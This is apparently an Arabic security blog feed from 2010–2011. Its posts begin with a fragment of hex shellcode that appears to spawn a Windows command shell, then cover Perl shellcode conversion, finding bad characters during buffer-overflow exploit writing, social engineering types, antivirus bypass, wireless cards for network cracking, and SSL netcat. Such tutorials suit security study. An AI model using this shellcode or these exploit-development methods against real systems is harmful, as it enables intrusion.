"\x51\x8b\x4b\x1c\x01\xe9\x89\xe8".

"\x03\x04\x91\xab\x80\x3e\x09\x75".

"\x08\x8d\x5e\x04\x53\xff\xd0\x57".

"\x95\x80\x3e\x73\x75\xb1\x5e\xad".

"\xff\xd0\xad\xff\xd0\x95\x81\x2f".

"\xfe\xff\x8f\x33\x6a\x10\x57\xad".

"\x55\xff\xd0\x85\xc0\x74\xf8\x31".

"\xd2\x52\x68\x63\x6d\x64\x20\x8d".

"\x7c\x24\x38\xab\xab\xab\xc6\x47".

"\xe9\x01\x54\x87\x3c\x24\x57\x52".

"\x52\x52\xc6\x47\xef\x08\x57\x52".

"\x52\x57\x52\xff\x56\xe4\x8b\x46".

"\xfc\xe9\xca\xff\xff\xff";

Number of null bytes : 0

--------------------------------------------

Displaying bytes as ascii :

--------------------------------------------

تحويل الـ Shellcode من Hex إلى Binary

- لتحميل الأداة pveWritebin

- طريقة الاستخدام

افتح السكربت و استبدل العبارة “Put You Shellcode Here Line“ بالـ Shellcode خاصتك

#!/usr/bin/perl

# Perl script written by Peter Van Eeckhoutte

# http://www.corelan.be:8800

# This script takes a filename as argument

# will write bytes in \x format to the file

#

if ($#ARGV ne 0) {

print " usage: $0 ".chr(34)."output filename".chr(34)."\n";

exit(0);

}

system("del $ARGV[0]");

my $shellcode="Put You Shellcode Here Line1".

"Put You Shellcode Here Line2".

"Put You Shellcode Here Line3";

#open file in binary mode

print "Writing to ".$ARGV[0]."\n";

open(FILE,">$ARGV[0]");

binmode FILE;

print FILE $shellcode;

close(FILE);

print "Wrote ".length($shellcode)." bytes to file\n";

ثم نفذ السكريبت بهذه الطريقة

perl pveWritebin.pl shellcode.bin

تحذير!!

احذر من أن تستخدم Shellcode غير موثوق و اعرف محتويات هذا الملف (لأنه يقد يحتوي على أوامر تضر بنظامك!!) بالطرق التالية:

- على اللنوكس -> strings

strings shellcode.bin

- على ويندوز -> type

type shellcode.bin

لمزيد عن هذا الموضوع

صورة ذات علاقة

تحياتي و احترامي

© Eng. Sabri Saleh for مجتمع الحماية العربي, 2011. | Permalink | 4 comments | Add to del.icio.us
Post tags: Binary to Hex, buffer overflow, Hex to Binary, immunity debuger, PoC, pveReadbin, pveWritebin

Feed enhanced by Better Feed from Ozh

إيجاد الـ Bad Characters في الـ Shellcode

صبري صالح — Wed, 12 Jan 2011 23:55:25 +0000

مقدمة

في مرحلة من مراحل كتابتنا لثغرة BufferOverflow فإننا قد نعاني من مشكلة مملة و نجد أن الـPayload يعطّل الـ Exploit بكامله مع أننا قد تأكدنا أن كل شئ يمشى بأفضل حال قبل وضع الـ Shellcode الحقيقي. السبب في ذلك هو وجود الـ Bad Characters أو الـ Restricted Characters.

ستكتشف تلك المشكلة عندما تضع نقطة وقوف Break Point في الـ Debugger ولكن عند تنفيذ الثغرة لن تصل إلى ذلك العنوان. أو أنك ستصل ولكن الـ Shellcode لن يعمل (بشرط تأكدك أن جميع الأجزاء الأخرى سليمة).

ما هي الـ Bad/Restricted Characters؟

هي Characters عادية من ضمن الـ Shellcode يتم عمل Decoding لها بشكل طبيعي ولكن لها معنى لا يقبله البرنامج المصاب كأن يكون هذا الـ Characters سيدخل في تسمية ملف مثلا و فلو فرضنا أن في الشل كود قيمة ستدخل في تسمية ملف ما و كانت القيمة “\x7D” و التي تعني “}” و من المعروف أننا لا نستطيع وضع هذا الحرف في إسم ملف فوقتها سيوقف هذا الحرف مجرى عملية الـ Decoding للـ Shellcode.

قد يبدر إلى أذهاننا بعض الأسئلة, منها..

س/ هل جميع البرامج المصابة سيكون بها Bad Characters Restriction ؟

ج/ لا

س/ هل يوجد Bad Characters أساسية يجيب أزيلها من أي Shellcode أقوم بعمله؟

ج/ نعم, هما: x00 و x0d

س/ هل كل البرامج لها نفس الـ Bad Characters أي أنني أستطيع أن أحذف كل ما تم اكتشافه سابقا في البرامج اللاحقة؟

ج/ لا, لكل برنامج Bad Characters مختلفة تختلف بطبيعة البرنامج و طريقة تنفيذه

س/ هل يمكن أن يحتوي البرنامج على أكثر من Bad Character واحد ؟

ج/ للأسف نعم

إيجاد الـ Bad Characters – الطريقة الأولى

في البداية, هذه الطريقة هي طريقة مملة و مرهقة جدا و إن كنت سأعطيها إسما فلا أجد أفضل من “طريقة السكتة الدماغية“ حيث يتوقف العقل عن التفكير تماما مع الحاجة إلى الكثير من العمل الممل إلا إذا كنت محظوظ و وجدت الحرف في أول سطر أو سطرين, وأمر الحظ بالذات غير متوفر بالنسبة لي شخصيا.

تعتمد هذه الطريقة على إنشاء جميع احتمالات الحروف من 0-255 عن طريق سكريبت يسمى generatecodes.pl.

في البداية تقوم بتنفيذ السكريبت مع إزالة الـBad Characters الشائعة x00 و x0d .

./generatecodes.pl 00,0d
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e"
"\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d"
"\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c"
"\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b"
"\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a"
"\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79"
"\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88"
"\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97"
"\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6"
"\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5"
"\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4"
"\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3"
"\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2"
"\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1"
"\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"

الأن نأخذ أول سطر من المخرجات و نستبدل الـ Shellcode بهذا السطر و نضع الـ Break Point خاصتنا و من ثم ننفذ البرنامج. إذا وصلنا للعوان الصحيح فهذا يعني أن Bad Characters ليست من ضمن الحروف التي في السطر الأول.

مثال:

shellcode = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0e\x0f\x10")

الأن نضيف السطر الثاني من المخرجات إلى السطر الأول و نضع الـ Break Point خاصتنا و من ثم ننفذ البرنامج. إذا وصلنا للعوان الصحيح فهذا يعني أن Bad Characters ليست من ضمن الحروف التي في السطر الثاني, و هكذا.

مثال:

shellcode = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f")

عندما لا نصل للعنوان الصحيح, نقوم بقسم السطر الذي وصلنا عنده و حصل عنده خطأ في النتائج و نستبدل النصف الأول منه بـ “\x41″ مثلا . ثم نجرب فإن حصل خطأ, فهذا يعني أن الـ Bad Character في النصف الأخر, وقتها نبدأ نغير حروف النصف الثاني من السطر الأخير إلى “\x41″ و نجرب في كل مره حتى نصل أنه لا يوجد خطأ في النتائج و عندها سنعرف ال Bad Character

مثال:

"\x41\x41\x41\x41\x41\x41\x41\x41\x28\x29\x2a\x2b\x2c\x2d\x2e"

سنفترض أننا وجدنا و أنه “x0a” إذا سنقول بعمل الأتي

./generatecodes.pl 00,0d,0a
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11"
"\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f"
"\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e"
"\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d"
"\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c"
"\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b"
"\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a"
"\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89"
"\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98"
"\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7"
"\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6"
"\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5"
"\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4"
"\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3"
"\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2"
"\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"

و نتأكد مرة أخرى, لو لظهر أي خطأ في مجرى سير البرنامج في الـ Debugger إذن كل شئ على ما يرام. و إن لم!!, فهذا يعني -ولا حول ولا قوه إلا بالله- أنه يوجد Bad Character أخر و يجب أن تكمل المسيرة حتى تجده.

إيجاد الـ Bad Characters – الطريقة الثانية

في البداية أحب أن أرفع القبعة إلى Peter Van رئيس فريق Corelan و هو من أشهر و أقوى الأشخاص في شرح الـ Buffer Overflow ومبرمج للعديد من السكربتات المفيدة جدا في هذا المجال.

الطريقة الثانية هي عن طريق إضافة رائعة إسمها pvefindaddr مع استخدام الدالة compare

ملاحظة: لا تنسى إضافة pvefindaddr فلها استخدامات كثيرة و رائعة في الـ Buffer Overflow

كل ما عليك فعله هو وضع الإضافة في مجلد الـمنقح Immunity debugger في المسار التالي

C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands

ثم ضع ملف الـ Shellcode في الـ C حيث يكون مساره

c:\shellcode.bin

ملاحظة: إذا كان الـShellcode بصيغة الـ Hex فيجب تحويله إلى Binary , الرجاء زيارة هذا الرابط

الأن ضع الـ Break point خاصتك ثم نفذ الـ exploit الذي يحتوي على الـ shellcode الحقيقي

بمجرد توقف البرنامج, نفذ الأمر التالي في Command bar في الـ Immunity Debugger

!pvefindaddr compare c:\shellcode.bin

ستخرج لك نافذة تحتوي على العناوين التي تتواجد بها الـ Bad Characters مثل هذه

الأن اذهم إلى نافذة الـسجلات من

View >> Log أو اضغط ALT + L

ستجد التالي: (يرجى تكبير الصورة)

كما ترى في حالتي كانت الـ Bad Characters هي 5c و 2f

أيضا تستطيع أن تجد النتائج في ملف compare.txt على هذا المسار

“C:\Program Files\Immunity Inc\Immunity Debugger“ (هذا المسار يحتوي على معظم نتائج استخدام pvefindaddr).

تحياتي واحترامي

© Eng. Sabri Saleh for مجتمع الحماية العربي, 2011. | Permalink | 14 comments | Add to del.icio.us
Post tags: bad characters, buffer overflow, immunity debuger, pvefindaddr, restrected characters, Shell Code

Feed enhanced by Better Feed from Ozh

الهندسة الإجتماعيّة: الحلقة الأولى

مجتمع الحماية — Mon, 27 Dec 2010 18:41:25 +0000

الهندسة الإجتماعيّة هي اسم تقني للخداع والتّحايل. يهدف فيها المهاجم إلى الإيقاع بالضّحيّة للحصول على معلومات منه عن الهدف الذي يسعى إلى اختراقه (أو التّسلل إليه). في المجال الأمني التّقني تعدّ الهندسة الإجتماعيّة أحد أقدم أنواع القرصنة.

ترتكز الهندسة الإجتماعيّة على استغلال العامل البشري. فالإنسان بطبعه:

1- لديّه الرّغبة في أن يساعد الآخرين.
2- عنده نزعة للثّقة بغيره.
3- يخشى من الوقوع في المشاكل.
4- يتحاشى المواجهة.

باستغلال أحد هذه الطباع أو أكثر، يمكن للقراصنة الإلتفات على إجراءات الحماية داخل المؤسّسات. فكل ما على المهاجم (القرصان) فعله، هو استغلال موظف من داخل المؤسّسة في الهجوم عليها. هذا عمليّاً يوفر على المهاجم الكثير من الوقت الذي سيصرفه في: أيجاد ثغرات في النّظام، استغلال الثغرات، الحصول على كلمات مرور ومن ثمّ كسر كلمات المرور…إلخ.

ومع الانتشار الكبير للشّبكات الإجتماعيّة، تحسّنت إلى حدٍّ كبير القدرة على القيام بالهندسة الإجتماعيّة. فالشبكات الإجتماعية تحتوي على معلومات على الأشخاص وعلاقاتهم، وبعض (أو الكثير) من تفاصيل حياتهم…..إلخ.

أنواع الهندسة الإجتماعيّة

يمكن تقسيم الهندسة الإجتماعيّة اليوم إلى أربعة أنواع: (هذا التّقسيم يتغيّر مع الوقت تبعاً للأساليب والتّقنيات التي يوظّفها المهاجمون في هجومهم)

1- المباشر

هنا يقوم المهاجم بالتّوجّه إلى الهدف بنفسه محاولاً الدخول إلى مناطق غير مصرّح لها به. كأن يدّعي مثلاً أنّه يعمل في شركة الهاتف ويريد اصلاح خلل ما في شبكة الهاتف داخل الشركة.

2- التّحايل

وهو وضع الضحيّة في موقف سيناريو معيّن يبدو واقعيّاً وقابلاً للتّصديق، ولكنّه في الحقيقة غير ذلك. والغرض منه الحصول من الضّحيّة على معلومات كحسابه البنكي، او اسم المستخدم و/أو كلمة المرور الخاصّة به. مثلاً انتحال شخصيّة فنّي حاسوب، يحاول مساعدة موظّف في تحديث نظامه، أو معالجة مشكلة في الطابعة، إلخ. الموظّف أكيد لديه مشكلة (إذا عملت فنّي حاسوب فستفهم قصدي تماماً )، حاسوبه يعمل ببطئ، أو تصفّحه للإنترنت بطيء. فنّي الحاسوب يقوم بإرشاد الموظّف عبر الهاتف حول كيفيّة تحسين أداء حاسوبه، أو سرعة الاتصال لديه عبر تحميل برنامج ما يرسله المهاجم (فنّي الحاسوب) إلى الموظّف (الضحيّة) وتنصيب هذا البرنامج على حاسوب الموظّف. البرنامج هو عبارة عن برمجيّة خبيثة، مثلاً حصان طروادة، حيث يتمّ دمج برنامج حقيقي سليم ببرنامج آخر ضار. هذا البرنامج الضّار يمكن المهاجم من الحصول على موطئ قدم في حاسوب الضحيّة، والشبكة داخل المؤسّسة ككل.

3- التّصيّد

في هجمات التّصيّد يقوم المهاجم بإرسال كم كبير من الرّسائل الإلكترونيّة التّي توظّف الخداع لجعل المستخدم يقوم بتنفيذ برنامج ضار يقوم مرفقاً بالرّسالة. طبعاً المهاجم لا يتنظر أن يقوم كل فرد وصلت له رسالة المهاجم بفتحها وفتح الملفات المرفقة معها. فالصّياد عندما يضع الطعم للأسماك عند صيده لا يتوقع أن تبتلع كل الأسماك الطّعم.

التّصيّد نفسه أنواع، النّوع الذي ذكرته قبل قليل هو النّوع العام. ولكن هناك نوع آخر منه ويدعى التّصيد المستهدَف. في هذا النّوع يقوم المهاجم بإرسال رسائل إلكترونيّة لأفراد يعملون في شركة معيّنة مثلاً. مثل الهجوم الذي تعرّضت له غوغل والذي يقال أنّه قد بدأ بهجوم تصيّد مستهدف. إذا لم تتضح الفكرة، ففكر بالصّياد الذي يريد اصطياد نوع معيّن من الأسماك فالصّياد في هذه الحالة سيهيّئ طُعماً يجذب هذا النّوع من الأسماك.

4- الطعم

هذا النّوع يستفيد من حبّ الاستطلاع والفضول لدى البشر. يقوم المهاجم بترك قرص مضغوط (CD,DVD)، أو ذاكرة متنقّلة (USB) في مكان بارز (قريب من شركة أو مؤسّسة ما يستهدفها المهاجم). محتوى القرص أو الذاكرة يحتوي على برنامج ضار كمسجّل المفاتيح (الذي يقوم بتسجيل كل ضغطة مفتاح على لوحة المفاتيح يقوم الضحيّة بها) أو حصان طروادة أو فيروس…إلخ.

في الحلقة القادمة إن شاء الله سنتناول نماذج من الهندسة الإجتماعيّة.

Feed enhanced by Better Feed from Ozh

اختبار اختراق نظام ويندوز 7 و تخطى حماية الكاسبر سكاى

مجتمع الحماية — Sat, 27 Nov 2010 01:42:53 +0000

هذه مساهمة مفيدة من الأخ محمد رمضان تشرح اختراق نظام ويندوز 7 وتخطي حماية برنامج مكافحة الفيروسات كاسبرسكي 2011. الأخ محمد تطرق لبعض النقاط الهامة والتي ينصح بها عند القيام باختبارات الأختراق.

الشرح يأتي في ثلاثة اجزاء

الجزء الأول

الجزء الثاني

الجزء الثالث

ويمكن مشاهدة الفيديو كاملاً من خلال الرابط التالي:

http://blip.tv/file/4426743

نشكر الأخ محمد على مساهمته القيّمة ونتمّنى أن يستفيد منها الجميع

Feed enhanced by Better Feed from Ozh

قائمة بكروت الوايرليس لاختراق شبكات الوايرليس

صبري صالح — Tue, 12 Oct 2010 18:01:07 +0000

أثناء تصفحي كنت أبحث عن كروت الوايرليس التي تصلح لاختراق الشبكات و في نفس الوقت تكون مدعومة جيدا في اللينوكس. ما يميز هذه الكروت عن غيرها هو احتوائها على شريحة Atheros الداعمة لوضع “Monitoring Mode“ أو الـ “Infrastructure Mode“ و هي الأشهر.

إليكم القائمة

          o 3Com
                + OfficeConnect Wireless 11a/b/g PC Card 3CRWE154A72
                + 11a/b/g Wireless PC Card w/ XJACK Antenna 3CRPAG175
                + Wireless 11a/b/g PC Card with XJACK Antenna (3CRPAG175B)
                + 11a/b/g Wireless PCI Adapter 3CRDAG675
                + Wireless 11a/b/g PCI Adapter (3CRDAG675B)
                + OfficeConnect Wireless 108Mbps 11g XJACK PC Card (3CRXJK10075)
          o Acer
                + Nplify 802.11 b/g/n
          o AirLink
                + AWLH-4030
          o AOpen
                + AOI-811
          o Atheros
                + Atheros reference design
                + Atheros AR5001X+
                + Atheros AR5002X
                + Atheros AR5002G
                + Atheros AR5004X
                + Atheros AR5004G
          o AT&T
                + Plug and Share 6500G
                + Plug and Share 6550G
                + Plug and Share 6700G
          o Alfa
                + AWUS036NH
                + AWUS036NEH
                + AWUS051NH
          o Blitzz
                + BWI715
                + NetWave Point PC
          o Cisco
                + Aironet CB21AG
          o Conceptronic
                + C54i
          o D-Link
                + AirPro DWL-AB650
                + AirPlus DWL-650+
                + DWL-G650
                + DWL-AG650
                + DWL-AG520
                + DWL-G520
                + DWL-AG530
                + DWL-G630
                + DWL-G510
          o IBM
                + T40p/IBM ab miniPCI
                + T42/IBM abg miniPCI
          o HP
                + WLAN W500 (a/b/g)
                + WLAN W400 (b/g)
          o Gigabyte
                + GN-WMAG01
                + GN-WLMA102
                + GN-WIAG01
                + GN-WIAG02
          o LANCOM Systems
                + AirLancer MC-54ab
                + AirLancer MC-54ag
          o Level One
                + WNC-0300
                + WPC-0300 v3
          o Linksys
                + WMP55AG
                + WPC55AG (chipset AR5006X or AR5212
                + WPC54G V7
                + WRT54G v. 7  (older WRT54G's use a Proxim chipset and are well supported too)
                + WPC300N V2
                + WRT350N V2
          o NEC
                + Aterm WL54AG and PA-WL/54AG
          o Netgear
                + WAG11
                + WG311
                + WG311T
                + WG511T
                + WPN511
          o Netgate/Senao/EnGenius
                + 5034CB Aries
                + 5354 Aries 2 4G
          o Nortel
                + 2201 PCMCIA
          o Peabird
                + WLG-PCMCIA-TURBO
          o Planet
                + WL-3560
          o Procomp Informatics
                + PW-8860AS
          o Proxim
                + Orinoco 11b/g PC Card Silver (8471-WD)
                + Orinoco Gold 8470
                + Orinoco Gold 8470-FC
                + Orinoco Gold 8470-WD
                + Orinoco Gold 8480-WD
                + Orinoco Silver 8481-WD
                + Orinoco Silver 6460  (uncertain)
          o SMC
                + 2335W
          o Sony
                + PCWA-C300S
          o SPARKLAN
                + WMIA-105AG
                + WMIA-112AG
                + WMIA-123AG
          o TOPCOM
                + SKYR@CER PRO PCI 154
                + SKYR@CER PRO PC CARD 3054
          o TP-LINK
                + TL-WN510G
                + TL-WN322G
          o Wistron
                + AWLH-4030
                + CM9

قد يشتكي البعض من التعريفات , سأضع طريقة نجحت معي

تأكد من أن برنامج “ ndiswrapper “ موجود. ( استخدم yum أو apt-get )
ضع CD التعريف الذي يحوي تعرف الويندوز ثم ( cd to /media/cdrom0/ndis5 )
بصلاحيات الجذر, نفذ ( ndiswrapper -i netwpn11.inf )
بصلاحيات الجذر, نفذ ( ndiswrapper -m )
بصلاحيات الجذر, نفذ ( modprobe ndiswrapper ) - لن تحتاج لهذه الخطوة لو أعدت التشغيل
الأن وصل كرت الوايرليس في الجهاز و ابحث عن الشبكة

ملاحظة: برنامج ndiswrapper لا يدعم كل التعريفات فبعض التعريفات يدعمها برنامج Madwifi. بشكل عام تستطيع أن تزور هذه الصفحة و أيضا هذه الصفحة.

الرجاء لمن يعرف المزيد أن يزيدنا لنضعه في هذا الموضوع مع حفظ حقوقه.
أخر تحديث للموضوع: 21/10/2010

تحياتي واحترامي

© Eng. Sabri Saleh for مجتمع الحماية العربي, 2010. | Permalink | 16 comments | Add to del.icio.us
Post tags: atheros, warcraft, Wireless, WPA

Feed enhanced by Better Feed from Ozh

الاتصال الآمن في الأداة NetCat

صبري صالح — Fri, 17 Sep 2010 20:22:51 +0000

لا يخفى على أحد مهتم بالحماية أهمية هذه الأداة و ما تقدمة من مميزات. في هذا الموضوع لن أشرح الاستخدامات العادية و المشهورة فلكنا يعرف ما تقدمه الأداة من اتصال و إنصات و نقل ملفات و محادثة كتابية , إلخ.

هل فكرت أن تشفر الاتصال عندما تستخدم هذه الأداة الرائعة؟

إليك الطريقة

بشكل افتراضي فإن الأدة netcat لا تدعم الاتصال المشفر , ستجد في اللينوكس أن الأداة تأتي بإسمين هما nc و ncat والأخير هي النسخة المطورة من الـ nc و التي تدعم الاتصال المشفر بـSSL

سنقوم الأن بعمل محادثة صغيرة بين جهازين

الجهاز الأول

ncat -l --ssl 9911

الجهاز الثاني

ncat -vn 10.0.0.99 9911 --ssl

قبل استخدام الـ SSL

بعد استخدام الـ SSL

ماهي الأغراض الأخرى التي قد تحتاج فيها دعم الـ SSL ؟

الجواب:

عندما تحاول الاتصال بأحد الخدمات التي تستخدم الـ SSL لعمل port scanning مثلا فإنك لو استخدم الطريقة التقليدية فلن تحصل على النتائج المطلوبه

مثال,,

سنحاول أن نتصل بخادم البريد لـجووجل و الذي يدعم الـ SSL بشكل افتراضي

الطريقة التقليدية

nc gmail.google.com 443

GET / HTTP/1.1
[root@KING-SABRI KING]#

بطريقة دعم الـ SSL

ncat gmail.google.com 443 --ssl

GET / HTTP/1.1

HTTP/1.1 200 OK
Date: Fri, 27 Aug 2010 18:21:46 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: PREF=ID=c1d3dce8feaa44d1:TM=1282933306:LM=1282933306:S=U-GMKA7wWIYvzZOo; expires=Sun, 26-Aug-2012 18:21:46 GMT; path=/; domain=.google.com
Set-Cookie: NID=38=RPCPCmxT9uXfVa5qX6OMLvE1TdbWg9a45Y9sNVu5s1gcHZKbBMvlFpGVKUTRZMwdRw_81tOc4I8x1E7wuAYe86CkXTq6aEW80rDetrx7xZEyXva1j1hGW_RX_U6unOBe; expires=Sat, 26-Feb-2011 18:21:46 GMT; path=/; domain=.google.com; HttpOnly
Server: gws
X-XSS-Protection: 1; mode=block
Transfer-Encoding: chunked
…….

لتحميل الأداة

تحياتي و احترامي

© Eng. Sabri Saleh for مجتمع الحماية العربي, 2010. | Permalink | 8 comments | Add to del.icio.us
Post tags: backdoors, net cat, netcat SSL

Feed enhanced by Better Feed from Ozh